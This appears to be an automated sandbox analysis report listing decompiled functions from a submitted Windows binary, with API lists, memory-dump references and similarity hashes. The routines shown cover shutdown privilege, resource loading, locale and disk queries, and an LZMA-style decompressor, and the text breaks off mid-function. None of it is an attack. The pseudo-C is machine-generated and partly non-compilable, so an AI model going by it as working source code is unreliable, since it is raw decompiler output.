                                                            Download Yara Rule
                                                            C-Code - Quality: 91%
                                                            			E004AF110() {
				int _v4;
				struct _TOKEN_PRIVILEGES _v16;
				void* _v20;
				int _t7;

				if(E0041FF2C() != 2) {
					L5:
					_t7 = ExitWindowsEx(2, 0);
					asm("sbb eax, eax");
					return _t7 + 1;
				}
				if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v20) != 0) {
					LookupPrivilegeValueW(0, L"SeShutdownPrivilege",  &(_v16.Privileges));
					_v16.PrivilegeCount = 1;
					_v4 = 2;
					AdjustTokenPrivileges(_v20, 0,  &_v16, 0, 0, 0);
					if(GetLastError() == 0) {
						goto L5;
					}
					return 0;
				}
				return 0;
			}







                                                            0x004af11b
                                                            0x004af178
                                                            0x004af17c
                                                            0x004af184
                                                            0x00000000
                                                            0x004af186
                                                            0x004af12d
                                                            0x004af13f
                                                            0x004af144
                                                            0x004af14c
                                                            0x004af166
                                                            0x004af172
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004af174
                                                            0x00000000

                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(00000028), ref: 004AF120
                                                            • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 004AF126
                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 004AF13F
                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 004AF166
                                                            • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 004AF16B
                                                            • ExitWindowsEx.USER32(00000002,00000000), ref: 004AF17C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                            • String ID: SeShutdownPrivilege
                                                            • API String ID: 107509674-3733053543
                                                            • Opcode ID: dbd0b99069aff0d6788c9efc2bbd2c2bb6d4dae2a155ecb9c3cc528dabbfbf9f
                                                            • Instruction ID: 15d82be9bc359c8987119149698676c325083c88dcd196a4f2f9cd1a299335ef
                                                            • Opcode Fuzzy Hash: dbd0b99069aff0d6788c9efc2bbd2c2bb6d4dae2a155ecb9c3cc528dabbfbf9f
                                                            • Instruction Fuzzy Hash: 75F06D70684301B5E610A6F2CD07F6B21C89B56B58FA00D3EBA84E91C2D7BDD81D42BF
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004AF9F0, Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E004AF9F0() {
				struct HRSRC__* _t10;
				void* _t11;
				void* _t12;

				_t10 = FindResourceW(0, 0x2b67, 0xa);
				if(_t10 == 0) {
					E004AF834();
				}
				if(SizeofResource(0, _t10) != 0x2c) {
					E004AF834();
				}
				_t11 = LoadResource(0, _t10);
				if(_t11 == 0) {
					E004AF834();
				}
				_t12 = LockResource(_t11);
				if(_t12 == 0) {
					E004AF834();
				}
				return _t12;
			}






                                                            0x004af9ff
                                                            0x004afa03
                                                            0x004afa05
                                                            0x004afa05
                                                            0x004afa15
                                                            0x004afa17
                                                            0x004afa17
                                                            0x004afa24
                                                            0x004afa28
                                                            0x004afa2a
                                                            0x004afa2a
                                                            0x004afa35
                                                            0x004afa39
                                                            0x004afa3b
                                                            0x004afa3b
                                                            0x004afa43

                                                            APIs
                                                            • FindResourceW.KERNEL32(00000000,00002B67,0000000A,?,004B5F8E,00000000,004B654A,?,00000001,00000000,00000002,00000000,004B659E,?,00000000,004B65E2), ref: 004AF9FA
                                                            • SizeofResource.KERNEL32(00000000,00000000,00000000,00002B67,0000000A,?,004B5F8E,00000000,004B654A,?,00000001,00000000,00000002,00000000,004B659E), ref: 004AFA0D
                                                            • LoadResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,00002B67,0000000A,?,004B5F8E,00000000,004B654A,?,00000001,00000000,00000002,00000000), ref: 004AFA1F
                                                            • LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00002B67,0000000A,?,004B5F8E,00000000,004B654A,?,00000001,00000000,00000002), ref: 004AFA30
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Resource$FindLoadLockSizeof
                                                            • String ID:
                                                            • API String ID: 3473537107-0
                                                            • Opcode ID: 128b44542abe6d6e0e09835f67cf23f4a4e4be27e5836866f54195567a651b81
                                                            • Instruction ID: 8c15b2061d88d30e204a2d131290402b8da5209396f43898e5d703764eea749b
                                                            • Opcode Fuzzy Hash: 128b44542abe6d6e0e09835f67cf23f4a4e4be27e5836866f54195567a651b81
                                                            • Instruction Fuzzy Hash: FCE07E8074634625FA6436F718D7BAE00084B36B4DF40593FFA08A92D2EEAC8C19522E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040A4CC, Relevance: 4.6, APIs: 3, Instructions: 99COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 71%
                                                            			E0040A4CC(signed short __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr _v12;
				short _v182;
				short _v352;
				char _v356;
				char _v360;
				char _v364;
				int _t58;
				signed int _t61;
				intOrPtr _t70;
				signed short _t80;
				void* _t83;
				void* _t85;
				void* _t86;

				_t77 = __edi;
				_push(__edi);
				_v356 = 0;
				_v360 = 0;
				_v364 = 0;
				_v8 = __edx;
				_t80 = __eax;
				_push(_t83);
				_push(0x40a631);
				_push( *[fs:eax]);
				 *[fs:eax] = _t83 + 0xfffffe98;
				E00407A20(_v8);
				_t85 = _t80 -  *0x4b7a08; // 0x404
				if(_t85 >= 0) {
					_t86 = _t80 -  *0x4b7c08; // 0x7c68
					if(_t86 <= 0) {
						_t77 = 0x40;
						_v12 = 0;
						if(0x40 >= _v12) {
							do {
								_t61 = _t77 + _v12 >> 1;
								if(_t80 >=  *((intOrPtr*)(0x4b7a08 + _t61 * 8))) {
									__eflags = _t80 -  *((intOrPtr*)(0x4b7a08 + _t61 * 8));
									if(__eflags <= 0) {
										E0040A3EC( *((intOrPtr*)(0x4b7a0c + _t61 * 8)), _t61, _v8, _t77, _t80, __eflags);
									} else {
										_v12 = _t61 + 1;
										goto L8;
									}
								} else {
									_t77 = _t61 - 1;
									goto L8;
								}
								goto L9;
								L8:
							} while (_t77 >= _v12);
						}
					}
				}
				L9:
				if( *_v8 == 0 && IsValidLocale(_t80 & 0x0000ffff, 2) != 0) {
					_t58 = _t80 & 0x0000ffff;
					GetLocaleInfoW(_t58, 0x59,  &_v182, 0x55);
					GetLocaleInfoW(_t58, 0x5a,  &_v352, 0x55);
					E0040858C( &_v356, 0x55,  &_v182);
					_push(_v356);
					_push(0x40a64c);
					E0040858C( &_v360, 0x55,  &_v352);
					_push(_v360);
					_push(E0040A65C);
					E0040858C( &_v364, 0x55,  &_v182);
					_push(_v364);
					E004087C4(_v8, _t58, 5, _t77, _t80);
				}
				_pop(_t70);
				 *[fs:eax] = _t70;
				_push(E0040A638);
				return E00407A80( &_v364, 3);
			}

















                                                            0x0040a4cc
                                                            0x0040a4d7
                                                            0x0040a4da
                                                            0x0040a4e0
                                                            0x0040a4e6
                                                            0x0040a4ec
                                                            0x0040a4ef
                                                            0x0040a4f3
                                                            0x0040a4f4
                                                            0x0040a4f9
                                                            0x0040a4fc
                                                            0x0040a502
                                                            0x0040a507
                                                            0x0040a50e
                                                            0x0040a510
                                                            0x0040a517
                                                            0x0040a519
                                                            0x0040a520
                                                            0x0040a526
                                                            0x0040a528
                                                            0x0040a52d
                                                            0x0040a537
                                                            0x0040a53e
                                                            0x0040a546
                                                            0x0040a558
                                                            0x0040a548
                                                            0x0040a549
                                                            0x00000000
                                                            0x0040a549
                                                            0x0040a539
                                                            0x0040a53b
                                                            0x00000000
                                                            0x0040a53b
                                                            0x00000000
                                                            0x0040a55f
                                                            0x0040a55f
                                                            0x0040a528
                                                            0x0040a526
                                                            0x0040a517
                                                            0x0040a564
                                                            0x0040a56a
                                                            0x0040a58e
                                                            0x0040a592
                                                            0x0040a5a3
                                                            0x0040a5b9
                                                            0x0040a5be
                                                            0x0040a5c4
                                                            0x0040a5da
                                                            0x0040a5df
                                                            0x0040a5e5
                                                            0x0040a5fb
                                                            0x0040a600
                                                            0x0040a60e
                                                            0x0040a60e
                                                            0x0040a615
                                                            0x0040a618
                                                            0x0040a61b
                                                            0x0040a630

                                                            APIs
                                                            • IsValidLocale.KERNEL32(?,00000002,00000000,0040A631,?,004162BC,?,00000000), ref: 0040A576
                                                            • GetLocaleInfoW.KERNEL32(00000000,00000059,?,00000055,?,00000002,00000000,0040A631,?,004162BC,?,00000000), ref: 0040A592
                                                            • GetLocaleInfoW.KERNEL32(00000000,0000005A,?,00000055,00000000,00000059,?,00000055,?,00000002,00000000,0040A631,?,004162BC,?,00000000), ref: 0040A5A3
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Locale$Info$Valid
                                                            • String ID:
                                                            • API String ID: 1826331170-0
                                                            • Opcode ID: 62325bdbcd9f8bf22caa424e6d98428fadf2f4ef7d6ad95b5286de9b97f55654
                                                            • Instruction ID: 92a11a0233c3b219485afac9e49f2dea99407596d6f7a83949ef3a6145fdf69e
                                                            • Opcode Fuzzy Hash: 62325bdbcd9f8bf22caa424e6d98428fadf2f4ef7d6ad95b5286de9b97f55654
                                                            • Instruction Fuzzy Hash: 3831AE70A00308ABDF20DB64DD81BDEBBB9FB48701F5005BBA508B32D1D6395E90CE1A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0041A4DC, Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E0041A4DC(WCHAR* _a4, intOrPtr* _a8, intOrPtr* _a12) {
				long _v8;
				long _v12;
				long _v16;
				long _v20;
				intOrPtr _v24;
				signed int _v28;
				WCHAR* _t25;
				int _t26;
				intOrPtr _t31;
				intOrPtr _t34;
				intOrPtr* _t37;
				intOrPtr* _t38;
				intOrPtr _t46;
				intOrPtr _t48;

				_t25 = _a4;
				if(_t25 == 0) {
					_t25 = 0;
				}
				_t26 = GetDiskFreeSpaceW(_t25,  &_v8,  &_v12,  &_v16,  &_v20);
				_v28 = _v8 * _v12;
				_v24 = 0;
				_t46 = _v24;
				_t31 = E004095A8(_v28, _t46, _v16, 0);
				_t37 = _a8;
				 *_t37 = _t31;
				 *((intOrPtr*)(_t37 + 4)) = _t46;
				_t48 = _v24;
				_t34 = E004095A8(_v28, _t48, _v20, 0);
				_t38 = _a12;
				 *_t38 = _t34;
				 *((intOrPtr*)(_t38 + 4)) = _t48;
				return _t26;
			}

















                                                            0x0041a4e3
                                                            0x0041a4e8
                                                            0x0041a4ea
                                                            0x0041a4ea
                                                            0x0041a4fd
                                                            0x0041a50c
                                                            0x0041a50f
                                                            0x0041a51c
                                                            0x0041a51f
                                                            0x0041a524
                                                            0x0041a527
                                                            0x0041a529
                                                            0x0041a536
                                                            0x0041a539
                                                            0x0041a53e
                                                            0x0041a541
                                                            0x0041a543
                                                            0x0041a54c

                                                            APIs
                                                            • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?), ref: 0041A4FD
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: DiskFreeSpace
                                                            • String ID:
                                                            • API String ID: 1705453755-0
                                                            • Opcode ID: 35fab30d3ed47bb79bc7b5801678cd6b626cb6661b26d0a6d4a2aa78d0844cce
                                                            • Instruction ID: 14c90aad059d6341cd8fbca9d1c94cd423dd62e4f1f0ed92fc39ecac232c4210
                                                            • Opcode Fuzzy Hash: 35fab30d3ed47bb79bc7b5801678cd6b626cb6661b26d0a6d4a2aa78d0844cce
                                                            • Instruction Fuzzy Hash: 7711C0B5A01209AFDB04CF9ACD819EFB7F9EFC8304B14C569A505E7255E6319E018B94
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0041E034, Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E0041E034(int __eax, void* __ecx, int __edx, intOrPtr _a4) {
				short _v516;
				void* __ebp;
				int _t5;
				intOrPtr _t10;
				void* _t18;

				_t18 = __ecx;
				_t10 = _a4;
				_t5 = GetLocaleInfoW(__eax, __edx,  &_v516, 0x100);
				_t19 = _t5;
				if(_t5 <= 0) {
					return E00407E00(_t10, _t18);
				}
				return E00407BA8(_t10, _t5 - 1,  &_v516, _t19);
			}








                                                            0x0041e03f
                                                            0x0041e041
                                                            0x0041e052
                                                            0x0041e057
                                                            0x0041e059
                                                            0x00000000
                                                            0x0041e071
                                                            0x00000000

                                                            APIs
                                                            • GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 0041E052
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: InfoLocale
                                                            • String ID:
                                                            • API String ID: 2299586839-0
                                                            • Opcode ID: d1249f9bfb9152180de995f4510b089303b0330b3d36e5e1fa950d916a740853
                                                            • Instruction ID: c90943d4e22265a1f7ecf9aede9ac9faa011377f579ac525cbc4109061889d1c
                                                            • Opcode Fuzzy Hash: d1249f9bfb9152180de995f4510b089303b0330b3d36e5e1fa950d916a740853
                                                            • Instruction Fuzzy Hash: C7E09235B0421427E314A55A9C86AE7725D9B48340F40457FBD05D7382EDB9AE8042E9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0041E080, Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 79%
                                                            			E0041E080(int __eax, signed int __ecx, int __edx) {
				short _v16;
				signed int _t5;
				signed int _t10;

				_push(__ecx);
				_t10 = __ecx;
				if(GetLocaleInfoW(__eax, __edx,  &_v16, 2) <= 0) {
					_t5 = _t10;
				} else {
					_t5 = _v16 & 0x0000ffff;
				}
				return _t5;
			}






                                                            0x0041e083
                                                            0x0041e084
                                                            0x0041e09a
                                                            0x0041e0a2
                                                            0x0041e09c
                                                            0x0041e09c
                                                            0x0041e09c
                                                            0x0041e0a8

                                                            APIs
                                                            • GetLocaleInfoW.KERNEL32(?,0000000F,?,00000002,0000002C,?,?,?,0041E182,?,00000001,00000000,0041E391), ref: 0041E093
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: InfoLocale
                                                            • String ID:
                                                            • API String ID: 2299586839-0
                                                            • Opcode ID: c2a2e253f202cad765f8f9b35123567cb33a3e9031303696ff7b3b42dc5ba059
                                                            • Instruction ID: 961adf842b5e4829a7f1cb68f4be235500f18d0b61d537998bbd462cca006134
                                                            • Opcode Fuzzy Hash: c2a2e253f202cad765f8f9b35123567cb33a3e9031303696ff7b3b42dc5ba059
                                                            • Instruction Fuzzy Hash: 45D05EBA31923476E214915B6E85DB75ADCCBC87A2F14483BBE4CC6241D2A4CC46A275
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004AF218, Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E004AF218(signed int __eax) {
				short _v8;
				signed int _t6;

				_t6 = GetLocaleInfoW(__eax & 0x0000ffff, 0x20001004,  &_v8, 2);
				if(_t6 <= 0) {
					return _t6 | 0xffffffff;
				}
				return _v8;
			}





                                                            0x004af22e
                                                            0x004af235
                                                            0x00000000
                                                            0x004af23c
                                                            0x00000000

                                                            APIs
                                                            • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,00000000,?,?,004AF318), ref: 004AF22E
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: InfoLocale
                                                            • String ID:
                                                            • API String ID: 2299586839-0
                                                            • Opcode ID: 91ef75d91c3bf0fbfb4c903f00eadddcc0e9dd42321a82c412adf8826a4a964a
                                                            • Instruction ID: 3cbbb47bc5e3852376f83ef88ad8e7e21f22c900a58d153b56eed97a123c5839
                                                            • Opcode Fuzzy Hash: 91ef75d91c3bf0fbfb4c903f00eadddcc0e9dd42321a82c412adf8826a4a964a
                                                            • Instruction Fuzzy Hash: E8D0A5F55442087DF504C1DA5D82FB673DCD705374F500767F654C52C1D567EE015219
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0041C3D8, Relevance: 1.5, APIs: 1, Instructions: 6timeCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E0041C3D8() {
				struct _SYSTEMTIME* _t2;

				GetLocalTime(_t2);
				return _t2->wYear & 0x0000ffff;
			}




                                                            0x0041c3dc
                                                            0x0041c3e8

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: LocalTime
                                                            • String ID:
                                                            • API String ID: 481472006-0
                                                            • Opcode ID: 2bbd9f916a85fd19aaf3e135de3c6f6031220cebfdbc254b78c71648618a48a1
                                                            • Instruction ID: 79eafb11b28f80ce797d6e9fe134e5764476c7cb5db39d72cf417c4d7be8b418
                                                            • Opcode Fuzzy Hash: 2bbd9f916a85fd19aaf3e135de3c6f6031220cebfdbc254b78c71648618a48a1
                                                            • Instruction Fuzzy Hash: DAA0122080582011D140331A0C0313530405900620FC40F55BCF8542D1E93D013440D7
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004255DC, Relevance: .5, Instructions: 545COMMONCrypto
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E004255DC(intOrPtr* __eax, intOrPtr __ecx, intOrPtr __edx, intOrPtr* _a4, intOrPtr _a8) {
				intOrPtr* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				char _v25;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				char _v64;
				char* _v68;
				void* _v72;
				char _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				signed int _v88;
				char _v89;
				char _v96;
				signed int _v100;
				signed int _v104;
				short* _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				char _v136;
				signed int _t370;
				void* _t375;
				signed int _t377;
				signed int _t381;
				signed int _t389;
				signed int _t395;
				signed int _t411;
				intOrPtr _t422;
				signed int _t426;
				signed int _t435;
				void* _t448;
				signed int _t458;
				char _t460;
				signed int _t474;
				char* _t503;
				signed int _t508;
				signed int _t616;
				signed int _t617;
				signed int _t618;
				signed int _t622;

				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_v20 =  *((intOrPtr*)(_v8 + 0x10));
				_v24 = 0;
				_v32 = (1 <<  *(_v8 + 8)) - 1;
				_v36 = (1 <<  *(_v8 + 4)) - 1;
				_v40 =  *_v8;
				_t617 =  *((intOrPtr*)(_v8 + 0x34));
				_t474 =  *(_v8 + 0x44);
				_v44 =  *((intOrPtr*)(_v8 + 0x38));
				_v48 =  *((intOrPtr*)(_v8 + 0x3c));
				_v52 =  *((intOrPtr*)(_v8 + 0x40));
				_v56 =  *((intOrPtr*)(_v8 + 0x48));
				_v60 =  *((intOrPtr*)(_v8 + 0x2c));
				_v64 =  *((intOrPtr*)(_v8 + 0x30));
				_v68 =  *((intOrPtr*)(_v8 + 0x1c));
				_v72 =  *((intOrPtr*)(_v8 + 0xc));
				_t616 =  *((intOrPtr*)(_v8 + 0x28));
				_v128 =  *((intOrPtr*)(_v8 + 0x20));
				_v124 =  *((intOrPtr*)(_v8 + 0x24));
				_v120 = _v12;
				_v136 =  *((intOrPtr*)(_v8 + 0x14));
				_v132 =  *((intOrPtr*)(_v8 + 0x18));
				 *_a4 = 0;
				if(_v56 == 0xffffffff) {
					return 0;
				}
				__eflags = _v72;
				if(_v72 == 0) {
					_v68 =  &_v76;
					_v72 = 1;
					_v76 =  *((intOrPtr*)(_v8 + 0x4c));
				}
				__eflags = _v56 - 0xfffffffe;
				if(_v56 != 0xfffffffe) {
					L12:
					_v108 = _v16 + _v24;
					while(1) {
						__eflags = _v56;
						if(_v56 == 0) {
							break;
						}
						__eflags = _v24 - _a8;
						if(_v24 < _a8) {
							_t458 = _t616 - _t617;
							__eflags = _t458 - _v72;
							if(_t458 >= _v72) {
								_t458 = _t458 + _v72;
								__eflags = _t458;
							}
							_t460 =  *((intOrPtr*)(_v68 + _t458));
							 *((char*)(_v68 + _t616)) = _t460;
							 *_v108 = _t460;
							_v24 = _v24 + 1;
							_v108 = _v108 + 1;
							_t616 = _t616 + 1;
							__eflags = _t616 - _v72;
							if(_t616 == _v72) {
								_t616 = 0;
								__eflags = 0;
							}
							_t116 =  &_v56;
							 *_t116 = _v56 - 1;
							__eflags =  *_t116;
							continue;
						}
						break;
					}
					__eflags = _t616;
					if(_t616 != 0) {
						_v25 =  *((intOrPtr*)(_v68 + _t616 - 1));
					} else {
						_v25 =  *((intOrPtr*)(_v68 + _v72 - 1));
					}
					__eflags = 0;
					_v116 = 0;
					_v112 = 0;
					while(1) {
						L24:
						_v108 = _v16 + _v24;
						__eflags = _v24 - _a8;
						if(_v24 >= _a8) {
							break;
						} else {
							goto L25;
						}
						while(1) {
							L25:
							_v88 = _v24 + _v60 & _v32;
							__eflags = _v116;
							if(_v116 != 0) {
								break;
							}
							__eflags = _v112;
							if(_v112 == 0) {
								_t370 = E00425334((_t474 << 4) + (_t474 << 4) + _v20 + _v88 + _v88,  &_v136);
								__eflags = _t370;
								if(_t370 != 0) {
									_t375 = E00425334(_t474 + _t474 + _v20 + 0x180,  &_v136);
									__eflags = _t375 != 1;
									if(_t375 != 1) {
										_v52 = _v48;
										_v48 = _v44;
										_v44 = _t617;
										__eflags = _t474 - 7;
										if(__eflags >= 0) {
											_t377 = 0xa;
										} else {
											_t377 = 7;
										}
										_t474 = _t377;
										_v56 = E004254E4(_v20 + 0x664, _v88,  &_v136, __eflags);
										_t503 =  &_v136;
										__eflags = _v56 - 4;
										if(_v56 >= 4) {
											_t381 = 3;
										} else {
											_t381 = _v56;
										}
										_v100 = E004253BC((_t381 << 6) + (_t381 << 6) + _v20 + 0x360, _t503, 6);
										__eflags = _v100 - 4;
										if(_v100 < 4) {
											_t618 = _v100;
										} else {
											_v104 = (_v100 >> 1) - 1;
											_t524 = _v104;
											_t622 = (_v100 & 0x00000001 | 0x00000002) << _v104;
											__eflags = _v100 - 0xe;
											if(_v100 >= 0xe) {
												_t395 = E004252D4( &_v136, _t524, _v104 + 0xfffffffc);
												_t618 = _t622 + (_t395 << 4) + E00425400(_v20 + 0x644,  &_v136, 4);
											} else {
												_t618 = _t622 + E00425400(_t622 + _t622 + _v20 + 0x560 - _v100 + _v100 + 0xfffffffe,  &_v136, _v104);
											}
										}
										_t617 = _t618 + 1;
										__eflags = _t617;
										if(_t617 != 0) {
											L82:
											_v56 = _v56 + 2;
											__eflags = _t617 - _v64;
											if(_t617 <= _v64) {
												__eflags = _v72 - _v64 - _v56;
												if(_v72 - _v64 <= _v56) {
													_v64 = _v72;
												} else {
													_v64 = _v64 + _v56;
												}
												while(1) {
													_t389 = _t616 - _t617;
													__eflags = _t389 - _v72;
													if(_t389 >= _v72) {
														_t389 = _t389 + _v72;
														__eflags = _t389;
													}
													_v25 =  *((intOrPtr*)(_v68 + _t389));
													 *((char*)(_v68 + _t616)) = _v25;
													_t616 = _t616 + 1;
													__eflags = _t616 - _v72;
													if(_t616 == _v72) {
														_t616 = 0;
														__eflags = 0;
													}
													_v56 = _v56 - 1;
													 *_v108 = _v25;
													_v24 = _v24 + 1;
													_v108 = _v108 + 1;
													__eflags = _v56;
													if(_v56 == 0) {
														break;
													}
													__eflags = _v24 - _a8;
													if(_v24 < _a8) {
														continue;
													}
													break;
												}
												L93:
												__eflags = _v24 - _a8;
												if(_v24 < _a8) {
													continue;
												}
												goto L94;
											}
											return 1;
										} else {
											_v56 = 0xffffffff;
											goto L94;
										}
									}
									_t411 = E00425334(_t474 + _t474 + _v20 + 0x198,  &_v136);
									__eflags = _t411;
									if(_t411 != 0) {
										__eflags = E00425334(_t474 + _t474 + _v20 + 0x1b0,  &_v136);
										if(__eflags != 0) {
											__eflags = E00425334(_t474 + _t474 + _v20 + 0x1c8,  &_v136);
											if(__eflags != 0) {
												_t422 = _v52;
												_v52 = _v48;
											} else {
												_t422 = _v48;
											}
											_v48 = _v44;
										} else {
											_t422 = _v44;
										}
										_v44 = _t617;
										_t617 = _t422;
										L65:
										_v56 = E004254E4(_v20 + 0xa68, _v88,  &_v136, __eflags);
										__eflags = _t474 - 7;
										if(_t474 >= 7) {
											_t426 = 0xb;
										} else {
											_t426 = 8;
										}
										_t474 = _t426;
										goto L82;
									}
									__eflags = E00425334((_t474 << 4) + (_t474 << 4) + _v20 + _v88 + _v88 + 0x1e0,  &_v136);
									if(__eflags != 0) {
										goto L65;
									}
									__eflags = _v64;
									if(_v64 != 0) {
										__eflags = _t474 - 7;
										if(_t474 >= 7) {
											_t508 = 0xb;
										} else {
											_t508 = 9;
										}
										_t474 = _t508;
										_t435 = _t616 - _t617;
										__eflags = _t435 - _v72;
										if(_t435 >= _v72) {
											_t435 = _t435 + _v72;
											__eflags = _t435;
										}
										_v25 =  *((intOrPtr*)(_v68 + _t435));
